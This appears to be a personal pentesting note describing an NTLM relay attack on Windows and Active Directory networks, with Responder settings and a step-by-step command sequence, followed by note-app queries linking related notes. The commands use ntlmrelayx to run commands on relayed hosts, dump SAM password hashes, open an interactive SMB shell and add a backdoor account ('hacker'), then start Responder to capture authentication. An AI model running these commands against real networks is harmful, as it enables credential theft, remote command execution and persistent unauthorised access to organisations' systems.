[Responder Core] ; Set SMB and HTTP to Off to avoid conflicts with ntlmrelayx SMB = Off HTTP = Off HTTPS = On LDAP = On RDP = On SQL = On FTP = On POP = On IMAP = On SMTP = On DNS = On
Step 2: Setup ntlmrelayx
Start ntlmrelayx with target list:
# Basic relay to execute commands ntlmrelayx.py -tf targets.txt -c "whoami" # Relay and attempt to dump SAM ntlmrelayx.py -tf targets.txt --sam # Relay and get interactive SMB shell ntlmrelayx.py -tf targets.txt -i # Relay and execute specific command ntlmrelayx.py -tf targets.txt -c "net user hacker P@ssw0rd123 /add"
Alternative: Target specific host:
# Single target ntlmrelayx.py -t 192.168.1.10 -c "whoami"
Step 3: Start Responder
Run Responder to capture authentication:
# Basic responder on interface responder -I eth0 -A # Responder with analysis mode first (recommended) responder -I eth0 -A -f # Responder in verbose mode responder -I eth0 -v
Related
Related Notes
All Related Notes
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "windows") OR contains(tags, "active-directory") OR contains(tags, "smb") OR contains(tags, "relaying")SORT file.ctime DESC
windows
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "windows")SORT file.ctime DESC
active-directory
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "active-directory")SORT file.ctime DESC
smb
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "smb")SORT file.ctime DESC
relaying
TABLE file.ctime as "Created", tags as "Tags"FROM "New Notes"WHERE contains(tags, "relaying")SORT file.ctime DESC